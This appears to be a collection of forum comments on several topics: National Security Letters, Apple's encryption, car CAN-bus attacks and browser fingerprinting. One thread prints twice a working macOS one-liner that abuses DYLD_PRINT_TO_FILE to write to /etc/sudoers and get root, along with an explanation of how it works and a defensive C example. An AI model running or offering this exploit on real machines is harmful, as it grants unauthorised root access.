A piece of paper with the authority to throw you in jail.
True, but they would have to go to court to accomplish that.
My understanding is that all NSLs come with a gag order. If you go to a lawyer you violate the secrecy gag.
Not true. The EFF says: "Can I talk to a lawyer if I receive an NSL? Yes, you can talk to an attorney for legal advice if you receive an NSL, but the lawyer is then bound by the gag order just as you are."
Also, not all NSLs come with a gag order, just most.
I'm fairly sure an NSL can compel them to break future updates of hardware and software so that a wiretap is workable, and the gag order will prevent them from telling anyone about the new compromise.
Well, the people doing the biggest attacks against NSLs, the EFF, has this to say:
"While NSLs are unconstitutional, even the government admits that they can only be used to obtain limited information, which does not include forcing anyone to backdoor a product."
Do you believe the EFF doesn't know what it is talking about?
If I had said "it's not impossible because you can guess the 256-bit decryption key and be lucky" you'd have a point, but P=NP is not a pragmatic impossibility, it is very possible. Wikipedia reports a poll of 151 researchers in 2012 placing the probability somewhere between 9% and 17%.
No one today has publicly shown a way to decode the encryption method used by Apple, so pragmatically (meaning what is reasonable to expect or demand), it is considered impossible for Apple to comply with giving the FBI "real time access to text messages sent" by iMessage. Whether P=NP or not, until the encryption method is broken, the FBI demand can be considered "impossible" since Apple has no way today to comply.
An NSL cannot force a company to modify their hardware or software, only to grant access to what they already have. It is just a special kind of subpoena, one that the head of the FBI can issue without going to a court (which is why I think it would fail if brought to the Supreme Court), and can require the recipient not to divulge that it occurred. It only grants access to existing information, and cannot compel them to perform actions beyond pulling stored data or attaching a wire tap. Forcing a company to modify their user software to obtain access to user data has been ruled by courts to be beyond the scope of what a subpoena can compel.
The answer is in the second sentence of the article: The Justice Department obtained a court order that required Apple to provide real time access to text messages sent between suspects in an investigation involving guns and drugs.
You are confusing the literal meaning of impossible with the pragmatic meaning. People would say it is impossible to walk through a concrete wall, but quantum mechanics says it is possible, just so unlikely that it counts as impossible from a practical standpoint.
Isn't this wonderful? From the Fourth Amendment, we now have a situation where Privacy == Obstruction.
How in the FUCK did THAT happen?!?
Because the Fourth Amendment doesn't guarantee you absolute privacy, it grants "the right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures", meaning until a court has issued an order to grant such access "upon probable cause". In this case the court issues such an order. The question is, given the circumstances, what Apple is legally required to do. Hint: they are not required to change their software to create the ability for the government to get access, only to give the government what they already have access to.
BTW, this really should shut up all the slashtards that say that Apple secretly colludes with the Gummint; but it won't.
I think your faith in a human's ability to logically think past their biases is overblown. They will just claim it is a PR stunt to fool people into believing Apple can't read the messages while they are secretly handing over all the data. Never try to argue with a conspiracist since, no matter how sound your evidence, you will never win them over. As the saying goes, never argue with a fool, lest you are brought down to his level.
If "security" is just protecting against external threats, and she knew of internal threats, then a private email server makes sense for some types of email.
Yes, but the "internal" threats were these pesky things like the Inspector General, Congressional Oversight, Special Prosecutors, FOIA requests, etc.
An article I saw said what wasn't released was mostly a database of pictures and messages exchanged through the site. It said there were two problems with releasing the pictures, the database is very large (compared to the text files that compress fairly well), and 40% of the pictures were dick shots and they didn't want to release those. They could still release the database of messages though. I think they are doing the same things as the Snowden leaks, release parts at a time to keep the interest alive, and slowly drive the spike through AM's heart.
It's not a false claim, it's a joke. Laugh. Relax.
So someone takes a swing at me and I say WTF? and they say it was just a joke, then swing again and say it is still a joke. I can still hit him and call it self defense, joke or not, and he would deserve it. People will often call their bad acts a joke after the fact to avoid responsibility. It's like in this video where a guy tries to steal a purse, then laughs as if a prank, then tries to steal it again (only to get beat by the bus driver).
Did the student mean for his tweet to be a joke when he did it? I don't know, but based on what little I have read, which I admit isn't enough to ACTUALLY know the truth, it at least seems it wasn't and he is now in self-defense mode.
You don't seriously think the handbrake is an "emergency brake", right? Good grief, please be kidding.
It isn't a handbrake in my vehicle since it is on the floor, and such systems were originally put in place to provide a backup braking system in case the hydraulic system failed, especially since hydraulic braking systems used to be single-cylinder systems and were only mandated to use dual master cylinders starting in 1976. They were later adapted to provide a backup parking brake to supplement the vehicle being left in gear, and are now often also referred to as a parking brake.
So yes, I think of it as an "emergency brake". But then ideas like yours are why most people never think to use it when their regular brakes fail, just like they don't think to turn off the ignition if the throttle sticks.
First, how is it that you feel qualified to speak on this subject when you don't even know the difference between the second coming of Ol' Dirty Bastard, and On-Board Diagnostics?
The linked article explicitly spelled out the ODB-II, so I addressed that. The article said "The device that the UCSD researchers exploited for those attacks was a so-called OBD2 dongle"
Second, CAN is a protocol which is used with OBD-II. It is also used for communications between modules. Getting onto any bus on which the PCM speaks is sufficient for making an attack against the powertrain.
Which is why I said "accessing the CAN bus will probably yield the same capabilities."
Third, if the PCM is located under the hood, which it often is, then the diagnostic line (whether it's a CAN line like it usually is on modern cars, or one of the other protocols used with OBD-II) may well run through an exposed harness under the hood.
If you are going to break into the engine compartment, then it isn't that different than breaking into the car.
For example, in the Audi A8, the E-Box which contains the PCM, TCM and so on is right up against the firewall and there's a very short bit of harness with the diagnostic line in which doesn't get exposed. And in my particular vehicle, a very early 1997 A8 Quattro, the ABS controller is located inside up under the dashboard, so that diagnostic line (in my case a K-line, not CAN) is also inaccessible. But since there's only one diagnostic line which literally goes to all the modules, in the cars which immediately follow mine (starting in late 1997) which have the ABS controller located directly on the ABS module under the hood, it's relatively easy to access the bus — upon which live the PCM, TCM, ABS, and SRS. I think those vehicles actually have a gateway between the powertrain (which includes the ABS in modern vehicles) and SRS, and the infotainment bus, which includes the steering wheel controls. Some of the details of cars which are not mine are a bit hazy.
TL;DR: You don't know what you're on about, and sometimes a sensitive wire is accessible from beneath the hood, even if you can't raise it.
What sensitive wire is under the hood isn't that big of a problem, unless it is at the bottom of the compartment and easily accessible from underneath, because breaking into under the hood is almost the same as breaking into the car's interior. Climbing under a car and accessing directly exposed wires via a harness is a different matter, and what I was talking about. I never mentioned breaking into the hood-protected area to get to the bus.
The difference is to access the ODB-II requires getting into the vehicle without the owner knowing,
That depends on the vehicle. Some can be raised up, crawled beneath, and the harness accessed. Some, you can't get to it from there. Once you get there you only need three lines for OBD-II.
That is the CAN bus, not the ODB-II, but you are right, and I didn't want to spend the time explaining it, that accessing the CAN bus will probably yield the same capabilities. The CAN bus runs to a lot of components like the transmission and is often also exposed on the car's underside.
yes but you can't snip the brakes when the vehicle is going 75 MPH on the freeway...
With a small remotely operated tube cutter, yes. (two actually due to dual-cylinder brake systems) Same as this device, other than one device versus two. The difference is to access the ODB-II requires getting into the vehicle without the owner knowing, while attaching a tube cutter only requires access to the underside of the vehicle. The latter is actually easier. In both cases pressing the emergency brake (ever wonder why it is called that?) would activate the rear brakes unless that physical cable were also cut.
Sounds like the ideal sort of thing to be able to disable (or provide a random response to) in the browser.
Everything your browser does that is different than other browsers can be used to fingerprint you, so sending a random response would be an identifiable trait to narrow the group they think you are in. Better to send nothing, assuming most people's browsers don't send anything, or whatever the response a desktop sends when asked for its battery level.
Unlike the first commenter, I regularly see savings of 10-15 cents per gallon. With an 18 gallon tank, that could mean $2.70 in savings...much more than 30 cents.
The first poster said "it's not worth saving 30 cents a gallon on gas", so for an 18 gallon tank that would be $5.40.
It also does not take very long... And when you are in an unfamiliar area, it has benefits for savings and simply locating gas! Going to read the new terms now...
I agree. My tank is much larger 18 gallons, and prices around me vary by about 60 cents, so I can easily save $5 to $10 if needing to fill-up in an unfamiliar area versus stopping at the first place I see.
Also missing is the motivation - possible oil and gas reserves under the South China Sea. China wants to strengthen their territorial claim and then say the entire area is theirs.
They already say the entire area is theirs (see the dotted red line in the article). Their plan is for these islands to give them a stronger presence so they can militarily force the issue in the future.
Baker claims the spreadsheet compelled more Google employees to ask and receive "equitable pay based on data in the sheet."
90% of drivers think they are better than the average driver, and I would bet 90%+ of workers think they are better than average, and would therefore expect to be paid above the median (note for the statistically challenged - 90% of a group cannot be above the median). This study will give them data to know where they are on the graph. How will management deal with 90% of their workers demanding to be paid more since they are being paid below what they think they should be based on their (biased) self-assessment?
It's a hip way of saying small. He found that invoking DYLD_PRINT_TO_FILE runs as root, and as such can allow a user to write to /etc/sudoers, giving the user sudo privileges, letting them sudo to root.
echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
He found that invoking DYLD_PRINT_TO_FILE runs as root, and as such can allow a user to write to /etc/sudoers, giving the user sudo privileges, letting them sudo to root.
echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
Small correction. DYLD_PRINT_TO_FILE doesn't run as root, it just tells the dynamic library where to write error logs. The problem is it is accepted and used by child processes, even setuid ones, so by setting the environment variable, then calling sudo (which runs as root) with an invalid argument that will cause an error to be logged, he can create or append to any file on the machine he wants. He used the sudoers file for his example, but I am sure there are many other possibilities.
BTW, this is a similar exploit to the LD_LIBRARY_PATH exploit from many years ago where you could get a setuid program to use your dynamic library instead of the system one, thereby getting your code to run as root. It was fixed by having the loader check if the program uid doesn't equal euid and if so ignore the LD_LIBRARY_PATH variable. Apparently programmers at Apple are guilty of not learning from history and are therefore repeating it.
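The loader-side fix the comment above describes (ignore loader variables when a program runs with uid != euid), as an added C example that is not from this thread, from Apple, or from any real loader: a scrub routine that drops LD_* and DYLD_* entries from an inherited environment only when real and effective ids differ. It also covers the setgid case (gid != egid), which the comment does not mention; the function names and the sample environment are constructed.

```c
/* Added example, not the thread's or Apple's code: the "ignore loader
 * variables when privileged" check, applied to an envp array.  Names and
 * the sample environment below are constructed for the demonstration. */
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

/* Prefixes that steer the dynamic loader.  LD_LIBRARY_PATH (the old
 * exploit) and DYLD_PRINT_TO_FILE (the OS X one) both match. */
static const char *const UNSAFE_PREFIXES[] = { "LD_", "DYLD_" };

/* Returns 1 when a "NAME=value" entry names a loader-controlling variable. */
int is_unsafe_env_entry(const char *entry)
{
    for (size_t i = 0; i < sizeof UNSAFE_PREFIXES / sizeof *UNSAFE_PREFIXES; i++) {
        size_t n = strlen(UNSAFE_PREFIXES[i]);
        if (strncmp(entry, UNSAFE_PREFIXES[i], n) == 0)
            return 1;
    }
    return 0;
}

/* Removes unsafe entries from the NULL-terminated envp array in place,
 * but only when the process is privileged (real and effective ids differ,
 * as with a setuid or setgid binary).  Returns the number of entries
 * dropped; an unprivileged process keeps its environment untouched. */
size_t scrub_loader_env(char **envp, uid_t uid, uid_t euid, gid_t gid, gid_t egid)
{
    if (uid == euid && gid == egid)
        return 0;                       /* not privileged: nothing to do */
    size_t kept = 0, dropped = 0;
    for (size_t i = 0; envp[i] != NULL; i++) {
        if (is_unsafe_env_entry(envp[i]))
            dropped++;
        else
            envp[kept++] = envp[i];     /* compact the survivors */
    }
    envp[kept] = NULL;
    return dropped;
}

int main(void)
{
    /* Constructed environment resembling what a setuid child inherits. */
    char *env[] = {
        "PATH=/usr/bin:/bin",
        "DYLD_PRINT_TO_FILE=/etc/sudoers",
        "HOME=/Users/alice",
        "LD_LIBRARY_PATH=/tmp/untrusted",
        NULL
    };
    /* Pretend real uid 501 is running a root-setuid binary (euid 0). */
    size_t dropped = scrub_loader_env(env, 501, 0, 20, 20);
    printf("dropped %zu loader variable(s); remaining:\n", dropped);
    for (size_t i = 0; env[i] != NULL; i++)
        printf("  %s\n", env[i]);
    return 0;
}
```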
That was a major point toward the end of the linked article. The court said:
“The district court’s holding would logically result in the loss of a reasonable expectation of privacy in face-to-face conversations where one party is aware that a participant in the conversation may have a modern cellphone.”
Basically, if you are having a "private" conversation, and know that someone present may have a cell phone, then this precedent may mean you no longer have an expectation of privacy for the conversation.
Well, the EFF is only reporting what the government official 'said' was true.
Do you have a credible source that says otherwise, or just statements by people speculating to fit their theories?
but I'm fucking a woman into a long term relationship
But you're not fucking a woman who promised "to death do us part."
Depending on the husband, you might still get that.
(Try to avoid obstacles.)
But in my monster truck that takes the fun out of it!
Before you push that line, look up Iran Air flight 655. Russia is worse, but not the only one.